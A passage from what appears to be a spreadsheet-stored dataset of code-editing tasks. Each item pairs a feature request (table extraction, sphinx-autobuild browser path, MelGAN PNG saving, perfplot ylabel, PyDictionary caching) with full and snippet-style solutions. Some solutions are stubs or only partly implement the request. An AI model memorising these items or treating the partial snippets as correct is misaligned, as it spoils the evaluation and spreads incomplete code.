in enumerate(r2):\n                while r != len(r2) - 1 and (lastx[n][0] &gt; r2[r][0]):\n                    r += 1\n                if n != 0:\n                    if r2[r - 1][0] &gt; lastx[n - 1][1]:\n                        if r2[r - 1][0] &lt; lastx[n][0]:\n                            lastx[n][0] = r2[r - 1][0]\n    \n    for r2 in final_rows:\n        for n, col in enumerate(r2):\n            if n != len(r2) - 1:\n                if col[2] &lt; lastx[n + 1][0]:\n                    if col[2] &gt; lastx[n][1]:\n                        lastx[n][1] = col[2]\n    \n    print(lastx)\n    col = np.zeros(maxr + 1)\n    col[0] = table[0]\n    prev = 0\n    i = 1\n    for x in range(len(lastx)):\n        if x == 0:\n            prev = lastx[x]\n        else:\n            col[i] = (lastx[x][0] + prev[1]) // 2\n            i += 1\n            prev = lastx[x]\n    \n    col = col.astype(int)\n    col[maxr] = table[2]\n    _row_ = sorted(row, key=lambda x: x)\n    _col_ = sorted(col, key=lambda x: x)\n    \n    for no, c in enumerate(_col_):\n        x_lines.append([c, table[1], c, table[3]])\n        cv2.line(im2, (c, table[1]), (c, table[3]), (255, 0, 0), 1)\n    \n    for no, c in enumerate(_row_):\n        y_lines.append([table[0], c, table[2], c])\n        cv2.line(im2, (table[0], c), (table[2], c), (255, 0, 0), 1)\n    \n    print(\"table:\", table)\n    \n    #Modify: Enhanced call to extract_table with error handling\n    try:\n        final = extract_table(image[table[1]:table[3], table[0]:table[2]], 0, (y_lines, x_lines))\n        if final is None:\n            print(\"[Warning] extract_table returned None, using fallback detection\")\n            final = []\n    except Exception as e:\n        print(f\"[Error] extract_table failed: {e}, using fallback detection\")\n        final = []\n    \n    cellBoxes = []\n    img4 = image.copy()\n    \n    for box in final:\n        cellBox = extractTextBless(image[box[1]:box[3], box[0]:box[4]])\n        for cell in cellBox:\n            cellBoxes.append([box[0] + cell[0], box[1] + cell[1], cell[2], cell[3]])\n            cv2.rectangle(img4, (box[0] + cell[0], box[1] + cell[1]), (box[0] + cell[0] + cell[2], box[1] + cell[1] + cell[3]), (255, 0, 0), 2)\n    \n    the_last_y = -1\n    cellBoxes = sorted(cellBoxes, key=lambda x: x[1])\n    cellBoxes2BeMerged = []\n    cellBoxes2BeMerged.append([])\n    rowCnt = 0\n    \n    for cell in cellBoxes:\n        if(the_last_y == -1):\n            the_last_y = cell[1]\n            cellBoxes2BeMerged[rowCnt].append(cell)\n            continue\n        if(abs(cell[1] - the_last_y) &lt; 8):\n            cellBoxes2BeMerged[rowCnt].append(cell)\n        else:\n            the_last_y = cell[1]\n            rowCnt += 1\n            cellBoxes2BeMerged.append([])\n            cellBoxes2BeMerged[rowCnt].append(cell)\n    \n    MergedBoxes = []\n    for cellrow in cellBoxes2BeMerged:\n        cellrow = sorted(cellrow, key=lambda x: x[0])\n        cur_cell = -1\n        for c, cell in enumerate(cellrow):\n            if(cur_cell == -1):\n                cur_cell = cell\n                continue\n            if(len(cellrow) == 1):\n                MergedBoxes.append(cell)\n                break\n            if(abs((cur_cell[0] + cur_cell[2]) - cell[0]) &lt; 10):\n                cur_cell[2] = cur_cell[2] + cell[2] + (cell[0] - (cur_cell[0] + cur_cell[2]))\n                if(cur_cell[3] &lt; cell[3]):\n                    cur_cell[3] = cell[3]\n            else:\n                cur_cell[2] = cur_cell[0] + cur_cell[2]\n                cur_cell[3] = cur_cell[1] + cur_cell[3]\n                MergedBoxes.append(cur_cell)\n                cur_cell = cell\n        cur_cell[2] = cur_cell[0] + cur_cell[2]\n        cur_cell[3] = cur_cell[1] + cur_cell[3]\n        MergedBoxes.append(cur_cell)\n    \n    im3 = image.copy()\n    for bx in MergedBoxes:\n        cv2.rectangle(im3, (bx[0], bx[1]), (bx[2], bx[3]), (255, 0, 0), 2)\n    \n    TextChunks = []\n    TextChunks.append([])\n    rcnt = 0\n    ycnt = -1\n    final = sorted(final, key=lambda x: x[1])\n    \n    for box in final:\n        if(ycnt == -1):\n            ycnt = box[1]\n        tcurcell = []\n        mcurcell = []\n        for mbox in MergedBoxes:\n            if(mbox[0] &gt;= box[0] and mbox[1] &gt;= box[1] and mbox[2] &lt;= box[4] and mbox[3] &lt;= box[3]):\n                if(len(tcurcell) == 0):\n                    tcurcell = mbox\n                else:\n                    if(mbox[0] &lt; tcurcell[0]):\n                        tcurcell[0] = mbox[0]\n                    if(mbox[1] &lt; tcurcell[1]):\n                        tcurcell[1] = mbox[1]\n                    if(mbox[2] &gt; tcurcell[2]):\n                        tcurcell[2] = mbox[2]\n                    if(mbox[3] &gt; tcurcell[3]):\n                        tcurcell[3] = mbox[3]\n        \n        for i, frow in enumerate(final_rows):\n            for j, fbox in enumerate(frow):\n                if(fbox[0] &gt;= box[0] and fbox[0] &lt;= box[4] and fbox[1] &gt;= box[1] and fbox[1] &lt;= box[3]):\n                    mcurcell = fbox\n                    final_rows[i].pop(j)\n                    break\n        \n        if(abs(ycnt - box[1]) &gt; 10):\n            rcnt += 1\n            TextChunks.append([])\n            ycnt = box[1]\n        \n        if(len(tcurcell) == 0):\n            if(len(mcurcell) == 0):\n                continue\n            else:\n                TextChunks[rcnt].append(mcurcell)\n        else:\n            if(len(mcurcell) == 0):\n                TextChunks[rcnt].append(tcurcell)\n            else:\n                if(abs(mcurcell[0] - tcurcell[0]) &lt;= 20 and abs(mcurcell[1] - tcurcell[1]) &lt;= 20 and abs(mcurcell[2] - tcurcell[2]) &lt;= 20 and abs(mcurcell[3] - tcurcell[3]) &lt;= 20):\n                    TextChunks[rcnt].append(tcurcell)\n                elif((abs(mcurcell[0] - tcurcell[0]) &lt;= 20 and abs(mcurcell[2] - tcurcell[2]) &lt;= 20) or (abs(mcurcell[1] - tcurcell[1]) &lt;= 20 or abs(mcurcell[3] - tcurcell[3]) &lt;= 20)):\n                    TextChunks[rcnt].append(mcurcell)\n                else:\n                    TextChunks[rcnt].append(tcurcell)\n    \n    colors = [(255, 0, 0), (0, 255, 0), (0, 0, 255), (125, 125, 0), (0, 255, 255)]\n    for no, r in enumerate(TextChunks):\n        for tbox in r:\n            cv2.rectangle(im2, (tbox[0], tbox[1]), (tbox[2], tbox[3]), colors[no % len(colors)], 1)\n    \n    cv2.imshow(\"text chunks\", im2)\n    cv2.waitKey(0)\n    \n    def rowstart(val):\n        r = 0\n        while(r &lt; len(_row_) and val &gt; _row_[r]):\n            r += 1\n        if r - 1 == -1:\n            return r\n        else:\n            return r - 1\n    \n    def rowend(val):\n        r = 0\n        while(r &lt; len(_row_) and val &gt; _row_[r]):\n            r += 1\n        if r - 1 == -1:\n            return r\n        else:\n            return r - 1\n    \n    def colstart(val):\n        r = 0\n        while(r &lt; len(_col_) and val &gt; _col_[r]):\n            r += 1\n        if r - 1 == -1:\n            return r\n        else:\n            return r - 1\n    \n    def colend(val):\n        r = 0\n        while(r &lt; len(_col_) and val &gt; _col_[r]):\n            r += 1\n        if r - 1 == -1:\n            return r\n        else:\n            return</t>
  </si>
  <si>
    <t>{'#file 1': 'def extract_table(table_body, __line__, lines=None, missing_lines=False):\n    #Modify: Added missing_lines parameter\n    if (__line__ == 1):\n        temp_lines_hor, temp_lines_ver = line_detection(table_body)\n    else:\n        temp_lines_hor, temp_lines_ver = lines\n    if missing_lines:\n        # New: Handle missing lines\n        temp_lines_hor, temp_lines_ver = handle_missing_lines(temp_lines_hor, temp_lines_ver)\n    # Rest of the function...\n\n#New: Function to handle missing lines\ndef handle_missing_lines(hor_lines, ver_lines):\n    # Logic to handle missing lines\n    return hor_lines, ver_lines', '#file 2': 'def borderless(table, image, res_cells):\n    # Existing code...\n    final = extract_table(image[table[1]:table[3], table[0]:table[2]], 0, (y_lines, x_lines), missing_lines=True)\n    #Modify: Pass missing_lines parameter\n    # Rest of the function...', '#file 3': 'for i in imgs:\n    result = inference_detector(model, i)\n    res_border = []\n    res_bless = []\n    res_cell = []\n    root = etree.Element("document")\n    # Existing code...\n    if len(res_bless) != 0:\n        if len(res_cell) != 0:\n            for no, res in enumerate(res_bless):\n                root.append(borderless(res, cv2.imread(i), res_cell))\n    #Modify: Ensure interaction with updated borderless function'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'open_browser(url_host, args.delay)', 'invoking_code_segment': 'if args.open_browser:\n        open_browser(url_host, args.delay)', 'feature_description': 'Add a feature to allow users to specify a custom URL path for the browser to open. This enables users to navigate to a specific page within the documentation instead of always opening the root URL.', 'modified_complete_code': '# File 1: sphinx-autobuild/sphinx_autobuild/utils.py\n"""Generic utilities."""\n\nimport shlex\nimport socket\nimport threading\nimport time\nimport webbrowser\n\nfrom colorama import Fore, Style\n\n\ndef find_free_port():\n    """Find and return a free port number.\n\n    Shout-out to https://stackoverflow.com/a/45690594/1931274!\n    """\n    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n        s.bind(("", 0))\n        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n        return s.getsockname()[1]\n\n\n# Modify: Updated function signature to accept optional url_path parameter\ndef open_browser(url_host: str, delay: float, url_path: str = "") -&gt; None:\n    """Open browser at specified URL with optional custom path.\n    \n    Args:\n        url_host: The host and port (e.g., \'127.0.0.1:8000\')\n        delay: Delay in seconds before opening browser\n        url_path: Optional custom path to append to the URL (e.g., \'/api/docs\')\n    """\n    def _opener():\n        time.sleep(delay)\n        # Modify: Construct URL with optional path parameter\n        full_url = f"http://{url_host}{url_path}"\n        webbrowser.open(full_url)\n\n    t = threading.Thread(target=_opener)\n    t.start()\n    t.join()\n\n\ndef _log(text, *, colour):\n    print(f"{Fore.GREEN}[sphinx-autobuild] {colour}{text}{Style.RESET_ALL}")\n\n\ndef show(*, context=None, command=None):\n    """Show context and command-to-be-executed, with nice formatting and colours."""\n    if context is not None:\n        _log(context, colour=Fore.CYAN)\n    if command is not None:\n        assert isinstance(command, (list, tuple))\n        msg = f"&gt; {shlex.join(command)}"\n        _log(msg, colour=Fore.BLUE)\n\n\n# File 2: sphinx-autobuild/sphinx_autobuild/__main__.py\n"""Entrypoint for ``python -m sphinx_autobuild``."""\n\nimport argparse\nimport shlex\nimport sys\nfrom pathlib import Path\n\nimport colorama\nimport uvicorn\n\nfrom sphinx.cmd.build import get_parser as sphinx_get_parser\nfrom starlette.applications import Starlette\nfrom starlette.middleware import Middleware\nfrom starlette.routing import Mount, WebSocketRoute\nfrom starlette.staticfiles import StaticFiles\n\nfrom sphinx_autobuild import __version__\nfrom sphinx_autobuild.build import Builder\nfrom sphinx_autobuild.filter import IgnoreFilter\nfrom sphinx_autobuild.middleware import JavascriptInjectorMiddleware\nfrom sphinx_autobuild.server import RebuildServer\nfrom sphinx_autobuild.utils import find_free_port, open_browser, show\n\n\ndef main(argv=()):\n    """Actual application logic."""\n    colorama.just_fix_windows_console()\n\n    if not argv:\n        argv = sys.argv[1:]\n\n    args, build_args = _parse_args(list(argv))\n\n    src_dir = Path(args.sourcedir)\n    out_dir = Path(args.outdir)\n    out_dir.mkdir(parents=True, exist_ok=True)\n\n    serve_dir = out_dir\n    if args.make_mode_builder:\n        serve_dir = out_dir / args.make_mode_builder\n        serve_dir.mkdir(parents=True, exist_ok=True)\n\n    host_name = args.host\n    port_num = args.port or find_free_port()\n    url_host = f"{host_name}:{port_num}"\n\n    pre_build_commands = list(map(shlex.split, args.pre_build))\n\n    builder = Builder(\n        build_args,\n        url_host=url_host,\n        pre_build_commands=pre_build_commands,\n    )\n\n    watch_dirs = [src_dir] + args.additional_watched_dirs\n    ignore_dirs = [\n        ".git",\n        ".hg",\n        ".idea",\n        ".mypy_cache",\n        "node_modules",\n        ".nox",\n        ".ruff_cache",\n        ".pytest_cache",\n        ".pytype",\n        ".svn",\n        ".tox",\n        ".venv",\n        "venv",\n        ".vscode",\n        *args.ignore,\n        out_dir,\n        args.warnings_file,\n        args.doctree_dir,\n    ]\n    ignore_dirs = list(filter(None, ignore_dirs))\n    ignore_handler = IgnoreFilter(ignore_dirs, args.re_ignore)\n    app = _create_app(watch_dirs, ignore_handler, builder, serve_dir, url_host)\n\n    if not args.no_initial_build:\n        show(context="Starting initial build")\n        builder(rebuild=False)\n\n    if args.open_browser:\n        # Modify: Pass url_path parameter to open_browser function\n        open_browser(url_host, args.delay, url_path=args.browser_url_path)\n\n    show(context="Waiting to detect changes...")\n    try:\n        uvicorn.run(app, host=host_name, port=port_num, log_level="warning")\n    except KeyboardInterrupt:\n        show(context="Server ceasing operations. Cheerio!")\n\n\ndef _create_app(watch_dirs, ignore_handler, builder, out_dir, url_host):\n    watcher = RebuildServer(watch_dirs, ignore_handler, change_callback=builder)\n\n    return Starlette(\n        routes=[\n            WebSocketRoute("/websocket-reload", watcher, name="reload"),\n            Mount("/", app=StaticFiles(directory=out_dir, html=True), name="static"),\n        ],\n        middleware=[Middleware(JavascriptInjectorMiddleware, ws_url=url_host)],\n        lifespan=watcher.lifespan,\n    )\n\n\ndef _parse_args(argv):\n    sphinx_args = _get_sphinx_build_parser().parse_args(argv.copy())\n\n    parser = _get_parser()\n    args, build_args = parser.parse_known_args(argv.copy())\n\n    args.sourcedir = Path(sphinx_args.sourcedir).resolve(strict=True)\n    args.outdir = Path(sphinx_args.outputdir).resolve()\n    if sphinx_args.doctreedir:\n        args.doctree_dir = Path(sphinx_args.doctreedir).resolve()\n    else:\n        args.doctree_dir = None\n    if sphinx_args.warnfile:\n        args.warnings_file = Path(sphinx_args.warnfile).resolve()\n    else:\n        args.warnings_file = None\n\n    args.make_mode_builder = sphinx_args.use_make_mode or ""\n\n    return args, build_args\n\n\ndef _get_sphinx_build_parser():\n    sphinx_build_parser = sphinx_get_parser()\n    sphinx_build_parser.description = None\n    sphinx_build_parser.epilog = None\n    sphinx_build_parser.prog = "sphinx-autobuild"\n    for action in sphinx_build_parser._actions:\n        if hasattr(action, "version"):\n            action.version = f"%(prog)s {__version__}"\n            break\n    sphinx_build_parser.add_argument(\n        "-M",\n        dest="use_make_mode",\n        help=argparse.SUPPRESS,\n    )\n    _add_autobuild_arguments(sphinx_build_parser)\n\n    return sphinx_build_parser\n\n\ndef _get_parser():\n    """Get the application\'s argument parser."""\n    parser = argparse.ArgumentParser(allow_abbrev=False)\n    parser.add_argument(\n        "--version", action="version", version=f"sphinx-autobuild {__version__}"\n    )\n    _add_autobuild_arguments(parser)\n\n    return parser\n\n\ndef _add_autobuild_arguments(parser):\n    group = parser.add_argument_group("autobuild options")\n    group.add_argument(\n        "--port",\n        type=int,\n        default=8000,\n        help="port to serve documentation on. 0 means find and use a free port",\n    )\n    group.add_argument(\n        "--host",\n        type=str,\n        default="127.0.0.1",\n        help="hostname to serve documentation on",\n    )\n    group.add_argument(\n        "--re-ignore",\n        action="append",\n        default=[],\n        help="regular expression for files to ignore, when watching for changes",\n    )\n    group.add_argument(\n        "--ignore",\n        action="append",\n        default=[],\n        help="glob expression for files to ignore, when watching for changes",\n    )\n    group.add_argument(\n        "--no-initial",\n        dest="no_initial_build",\n        action="store_true",\n        default=False,\n        help="skip the initial build",\n    )\n    group.add_argument(\n        "--open-browser",\n        action="store_true",\n        default=False,\n        help="open the browser after building documentation",\n    )\n    group.add_argument(\n        "--delay",\n        dest="delay",\n        type=float,\n        default=5,\n        help="how long to wait before opening the browser",\n    )\n    # New: Add argument for custom browser URL path\n    group.add_argument(\n        "--browser-url-path",\n        dest="browser_url_path",\n        type=str,\n        default="",\n        help="custom URL path to open in browser (e.g., \'/api/docs\')",\n    )\n    group.add_argument(\n        "--watch",\n        action="append",\n        metavar="DIR",\n        default=[],\n        help="additional directories to watch",\n        dest="additional_watched_dirs",\n    )\n    group.add_argument(\n        "--pre-build",\n        action="append",\n        metavar="COMMAND",\n        default=[],\n        help="additional command(s) to run prior to building the documentation",\n    )\n    return group\n\n\nif __name__ == "__main__":\n    main(sys.argv[1:])'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def open_browser(url_host: str, delay: float, path: str = \'/\') -&gt; None:\n    def _opener():\n        time.sleep(delay)\n        webbrowser.open(f"http://{url_host}{path}")\n\n    t = threading.Thread(target=_opener)\n    t.start()\n    t.join() #Modify', '#file 2': 'if args.open_browser:\n        open_browser(url_host, args.delay, args.path) #Modify\n\n#New\nparser.add_argument(\n    "--path",\n    type=str,\n    default="/",\n    help="custom URL path to open in the browser",\n)', '#file 3': 'app = _create_app(watch_dirs, ignore_handler, builder, serve_dir, url_host)\n\n    try:\n        uvicorn.run(app, host=host_name, port=port_num, log_level="warning")\n    except KeyboardInterrupt:\n        show(context="Server ceasing operations. Cheerio!")'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'plot_waveform_to_numpy(waveform) function in melgan/utils/plotting.py', 'invoking_code_segment': "self.add_image('waveform_predicted', plot_waveform_to_numpy(prediction), step) and self.add_image('waveform_target', plot_waveform_to_numpy(target), step) in melgan/utils/writer.py", 'feature_description': 'Add a feature to save the waveform plot as a PNG file in addition to returning the numpy array. The function will now accept an optional output_path parameter and save the plot to disk when provided.', 'modified_complete_code': '# melgan/utils/plotting.py\nimport matplotlib\nmatplotlib.use("Agg")\nimport matplotlib.pylab as plt\nimport numpy as np\nimport os\n\ndef save_figure_to_numpy(fig):\n    # save it to a numpy array.\n    data = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep=\'\')\n    data = data.reshape(fig.canvas.get_width_height()[::-1] + (3,))\n    data = np.transpose(data, (2, 0, 1))\n    return data\n\n#Modify\ndef plot_waveform_to_numpy(waveform, output_path=None):\n    fig, ax = plt.subplots(figsize=(12, 3))\n    ax.plot()\n    ax.plot(range(len(waveform)), waveform,\n            linewidth=0.1, alpha=0.7, color=\'blue\')\n\n    plt.xlabel("Samples")\n    plt.ylabel("Amplitude")\n    plt.ylim(-1, 1)\n    plt.tight_layout()\n\n    #New\n    if output_path is not None:\n        os.makedirs(os.path.dirname(output_path), exist_ok=True)\n        fig.savefig(output_path, dpi=100, format=\'png\')\n\n    fig.canvas.draw()\n    data = save_figure_to_numpy(fig)\n    plt.close()\n    return data\n\n# melgan/utils/writer.py\nfrom tensorboardX import SummaryWriter\nimport os\nfrom .plotting import plot_waveform_to_numpy\n\nclass MyWriter(SummaryWriter):\n    def __init__(self, hp, logdir):\n        super(MyWriter, self).__init__(logdir)\n        self.sample_rate = hp.audio.sampling_rate\n        self.is_first = True\n        #New\n        self.logdir = logdir\n\n    def log_training(self, g_loss, d_loss, step):\n        self.add_scalar(\'train.g_loss\', g_loss, step)\n        self.add_scalar(\'train.d_loss\', d_loss, step)\n\n    #Modify\n    def log_validation(self, g_loss, d_loss, generator, discriminator, target, prediction, step):\n        self.add_scalar(\'validation.g_loss\', g_loss, step)\n        self.add_scalar(\'validation.d_loss\', d_loss, step)\n\n        #New\n        pred_png_path = os.path.join(self.logdir, f\'waveform_predicted_step_{step}.png\')\n        self.add_image(\'waveform_predicted\', plot_waveform_to_numpy(prediction, pred_png_path), step)\n\n        self.log_histogram(generator, step)\n        self.log_histogram(discriminator, step)\n\n        if self.is_first:\n            #New\n            target_png_path = os.path.join(self.logdir, f\'waveform_target_step_{step}.png\')\n            self.add_audio(\'raw_audio_target\', target, step, self.sample_rate)\n            self.add_image(\'waveform_target\', plot_waveform_to_numpy(target, target_png_path), step)\n            self.is_first = False\n\n        self.add_audio(\'raw_audio_predicted\', prediction, step, self.sample_rate)\n\n    def log_histogram(self, model, step):\n        for tag, value in model.named_parameters():\n            self.add_histogram(tag.replace(\'.\', \'/\'), value.cpu().detach().numpy(), step)'}</t>
  </si>
  <si>
    <t>{'#file 1': "def save_figure_to_numpy(fig):\n    # save it to a numpy array.\n    data = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='')\n    data = data.reshape(fig.canvas.get_width_height()[::-1] + (3,))\n    data = np.transpose(data, (2, 0, 1))\n    #Modify: Save the figure as a PNG file\n    fig.savefig('waveform_plot.png')\n    return data", '#file 2': 'def plot_waveform_to_numpy(waveform):\n    fig, ax = plt.subplots(figsize=(12, 3))\n    ax.plot()\n    ax.plot(range(len(waveform)), waveform,\n            linewidth=0.1, alpha=0.7, color=\'blue\')\n\n    plt.xlabel("Samples")\n    plt.ylabel("Amplitude")\n    plt.ylim(-1, 1)\n    plt.tight_layout()\n\n    fig.canvas.draw()\n    data = save_figure_to_numpy(fig)\n    plt.close()\n    return data\n\n#Modify: Update log_validation to handle the new PNG file saving feature\ndef log_validation(self, g_loss, d_loss, generator, discriminator, target, prediction, step):\n    self.add_scalar(\'validation.g_loss\', g_loss, step)\n    self.add_scalar(\'validation.d_loss\', d_loss, step)\n\n    self.add_audio(\'raw_audio_predicted\', prediction, step, self.sample_rate)\n    self.add_image(\'waveform_predicted\', plot_waveform_to_numpy(prediction), step)\n\n    self.log_histogram(generator, step)\n    self.log_histogram(discriminator, step)\n\n    if self.is_first:\n        self.add_audio(\'raw_audio_target\', target, step, self.sample_rate)\n        self.add_image(\'waveform_target\', plot_waveform_to_numpy(target), step)\n        self.is_first = False', '#file 3': 'train(args, pt_dir, args.checkpoint_path, trainloader, valloader, writer, logger, hp, hp_str)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'perfplot.show(), perfplot.bench(), perfplot.plot(), perfplot.save() functions from perfplot._main module', 'invoking_code_segment': 'test0(), test1(), test2(), test3(), test_no_labels(), test_automatic_scale(), test_save(), test_flops(), test_no_setup(), test_n_setups(), test_return_tuples() test functions calling perfplot functions', 'feature_description': "Add a new feature to allow users to specify a custom y-axis label in the plot by introducing a new optional parameter 'ylabel' that can be passed to perfplot.show(), perfplot.plot(), perfplot.save(), and perfplot.bench() functions. This parameter will override the default y-axis label generation.", 'modified_complete_code': '# perfplot/src/perfplot/__init__.py\nfrom .__about__ import __version__\nfrom ._main import bench, live, plot, save, show\n\n__all__ = ["bench", "plot", "show", "save", "live", "__version__"]\n\n# perfplot/src/perfplot/_main.py (relevant portions)\n# #Modify - Add ylabel parameter to function signatures\ndef show(\n    setup,\n    kernels,\n    n_range,\n    labels=None,\n    xlabel="n",\n    ylabel=None,  # #New parameter for custom y-axis label\n    logx=False,\n    logy=False,\n    flops=None,\n    time_unit="auto",\n):\n    # Function implementation\n    pass\n\ndef plot(\n    setup,\n    kernels,\n    n_range,\n    labels=None,\n    xlabel="n",\n    ylabel=None,  # #New parameter for custom y-axis label\n    logx=False,\n    logy=False,\n    flops=None,\n    time_unit="auto",\n):\n    # Function implementation\n    pass\n\ndef save(\n    filename,\n    setup,\n    kernels,\n    n_range,\n    labels=None,\n    xlabel="n",\n    ylabel=None,  # #New parameter for custom y-axis label\n    logx=False,\n    logy=False,\n    flops=None,\n    time_unit="auto",\n    relative_to=None,\n):\n    # Function implementation\n    pass\n\ndef bench(\n    setup,\n    kernels,\n    n_range,\n    labels=None,\n    xlabel="n",\n    ylabel=None,  # #New parameter for custom y-axis label\n    flops=None,\n    time_unit="auto",\n):\n    # Function implementation\n    pass\n\nclass PerfplotData:\n    def __init__(\n        self,\n        n_range,\n        timings_s,\n        labels,\n        xlabel,\n        title,\n        flop,\n        ylabel=None,  # #New parameter for custom y-axis label\n    ):\n        self.n_range = n_range\n        self.timings_s = timings_s\n        self.labels = labels\n        self.xlabel = xlabel\n        self.title = title\n        self.flop = flop\n        self.ylabel = ylabel  # #New attribute to store custom ylabel\n\n    def plot(self, time_unit="auto"):\n        # #Modify - Use custom ylabel if provided, otherwise generate default\n        if self.ylabel is not None:\n            y_label = self.ylabel\n        else:\n            # Default y-axis label generation logic\n            if self.flop is None:\n                y_label = f"Time [{self._get_time_unit(time_unit)}]"\n            else:\n                y_label = f"FLOPS [{self._get_time_unit(time_unit)}]"\n        \n        ax = plt.gca()\n        ax.set_ylabel(y_label)\n        # Rest of plot implementation\n        pass\n\n# perfplot/tests/test_perfplot.py\n# #New test case for custom ylabel feature\ndef test_custom_ylabel():\n    perfplot.show(\n        setup=np.random.rand,\n        kernels=kernels,\n        labels=["c_"],\n        n_range=r,\n        xlabel="len(a)",\n        ylabel="Custom Y-Axis Label",  # #New parameter usage\n    )\n\ndef test_custom_ylabel_with_save():\n    perfplot.save(\n        "out_custom.png",\n        setup=np.random.rand,\n        kernels=kernels,\n        n_range=r,\n        xlabel="len(a)",\n        ylabel="Execution Time (ms)",  # #New parameter usage\n        relative_to=0,\n    )'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def bench(setup, kernels, n_range, labels, xlabel, title, flops, equality_check, show_progress, target_time_per_measurement, max_time, time_unit, output, ylabel):  #Modify\n    # Existing code...\n    data = PerfplotData(\n        n_range=n_range,\n        timings_s=timings,\n        labels=labels,\n        xlabel=xlabel,\n        title=title,\n        flop=flop,\n        ylabel=ylabel  #Modify\n    )\n    # Existing code...', '#file 2': 'def show(setup, kernels, n_range, labels, xlabel, title, flops, equality_check, show_progress, target_time_per_measurement, max_time, time_unit, relative_to, automatic_order, logx, logy, colors, linestyles, styles, target_time, plot_kwargs, ylabel):  #Modify\n    out = bench(\n        setup=setup,\n        kernels=kernels,\n        n_range=n_range,\n        labels=labels,\n        xlabel=xlabel,\n        title=title,\n        flops=flops,\n        equality_check=equality_check,\n        show_progress=show_progress,\n        target_time_per_measurement=target_time_per_measurement,\n        max_time=max_time,\n        time_unit=time_unit,\n        output=None,\n        ylabel=ylabel  #Modify\n    )\n    # Existing code...', '#file 3': "perfplot.show(setup=np.random.rand, kernels=kernels, labels=['c_'], n_range=r, xlabel='len(a)', logx=True, logy=True)"}</t>
  </si>
  <si>
    <t>{'called_code_segment': '_get_soup_object function in utils.py', 'invoking_code_segment': 'synonym, antonym, and meaning static methods in core.py that call _get_soup_object', 'feature_description': 'Add a caching mechanism to store the results of synonym and antonym lookups to reduce the number of HTTP requests. The cache will store results by URL and return cached data when the same URL is requested again.', 'modified_complete_code': '# utils.py\nimport requests\nfrom bs4 import BeautifulSoup\n\n# New: Add cache dictionary to store soup objects by URL\n_soup_cache = {}\n\ndef _get_soup_object(url, parser="html.parser"):\n    # Modify: Check if URL is already in cache\n    if url in _soup_cache:\n        return _soup_cache[url]\n    # Modify: Fetch and cache the result\n    soup = BeautifulSoup(requests.get(url).text, parser)\n    _soup_cache[url] = soup\n    return soup\n\n# New: Add function to clear cache if needed\ndef clear_soup_cache():\n    global _soup_cache\n    _soup_cache = {}\n\n# New: Add function to get cache statistics\ndef get_cache_stats():\n    return {"cached_urls": len(_soup_cache), "urls": list(_soup_cache.keys())}\n\n---\n\n# core.py\nfrom __future__ import print_function\nimport sys, re, goslate\ntry:\n    from .utils import _get_soup_object, clear_soup_cache, get_cache_stats\nexcept:\n    from utils import _get_soup_object, clear_soup_cache, get_cache_stats\n\npython2 = False\nif list(sys.version_info)[0] == 2:\n    python2 = True\n\nclass PyDictionary(object):\n\n    def __init__(self, *args):\n        try:\n            if isinstance(args[0], list):\n                self.args = args[0]\n            else:\n                self.args = args\n        except:\n            self.args = args\n\n    def printMeanings(self):\n        dic = self.getMeanings()\n        for key in dic.keys():\n            print(key.capitalize() + \':\')\n            for k in dic[key].keys():\n                print(k + \':\')\n                for m in dic[key][k]:\n                    print(m)\n\n    def printAntonyms(self):\n        antonyms = dict(zip(self.args,self.getAntonyms(False)))\n        for word in antonyms:\n            print(word+\':\')\n            print(\', \'.join(antonyms[word]))\n\n    def printSynonyms(self):\n        synonyms = dict(zip(self.args,self.getSynonyms(False)))\n        for word in synonyms:\n            print(word+\':\')\n            print(\', \'.join(synonyms[word]))\n\n    def getMeanings(self):\n        out = {}\n        for term in self.args:\n            out[term] = self.meaning(term)\n        return out\n\n    def translateTo(self, language):\n        return [self.translate(term, language) for term in self.args]\n\n    def translate(self, term, language):\n        if len(term.split()) &gt; 1:\n            print("Error: A Term must be only a single word")\n        else:\n            try:\n                gs = goslate.Goslate()\n                word = gs.translate(term, language)\n                return word\n            except:\n                print("Invalid Word")\n\n    def getSynonyms(self, formatted=True):\n        return [self.synonym(term, formatted) for term in self.args]\n\n    def __repr__(self):\n        return "&lt;PyDictionary Object with {0} words&gt;".format(len(self.args))\n\n    def __getitem__(self, index):\n        return self.args[index]\n\n    def __eq__(self):\n        return self.args\n\n    def getAntonyms(self, formatted=True):\n        return [self.antonym(term, formatted) for term in self.args]\n\n    # New: Add method to clear cache\n    @staticmethod\n    def clearCache():\n        clear_soup_cache()\n\n    # New: Add method to get cache statistics\n    @staticmethod\n    def getCacheStats():\n        return get_cache_stats()\n\n    @staticmethod\n    def synonym(term, formatted=False):\n        if len(term.split()) &gt; 1:\n            print("Error: A Term must be only a single word")\n        else:\n            try:\n                # Modify: _get_soup_object now uses caching internally\n                data = _get_soup_object("https://www.synonym.com/synonyms/{0}".format(term))\n                section = data.find(\'div\', {\'class\': \'type-synonym\'})\n                spans = section.findAll(\'a\')\n                synonyms = [span.text.strip() for span in spans]\n                if formatted:\n                    return {term: synonyms}\n                return synonyms\n            except:\n                print("{0} has no Synonyms in the API".format(term))\n\n    @staticmethod\n    def antonym(term, formatted=False):\n        if len(term.split()) &gt; 1:\n            print("Error: A Term must be only a single word")\n        else:\n            try:\n                # Modify: _get_soup_object now uses caching internally\n                data = _get_soup_object("https://www.synonym.com/synonyms/{0}".format(term))\n                section = data.find(\'div\', {\'class\': \'type-antonym\'})\n                spans = section.findAll(\'a\')\n                antonyms = [span.text.strip() for span in spans]\n                if formatted:\n                    return {term: antonyms}\n                return antonyms\n            except:\n                print("{0} has no Antonyms in the API".format(term))\n\n    @staticmethod\n    def meaning(term, disable_errors=False):\n        if len(term.split()) &gt; 1:\n            print("Error: A Term must be only a single word")\n        else:\n            try:\n                # Modify: _get_soup_object now uses caching internally\n                html = _get_soup_object("http://wordnetweb.princeton.edu/perl/webwn?s={0}".format(term))\n                types = html.findAll("h3")\n                length = len(types)\n                lists = html.findAll("ul")\n                out = {}\n                for a in types:\n                    reg = str(lists[types.index(a)])\n                    meanings = []\n                    for x in 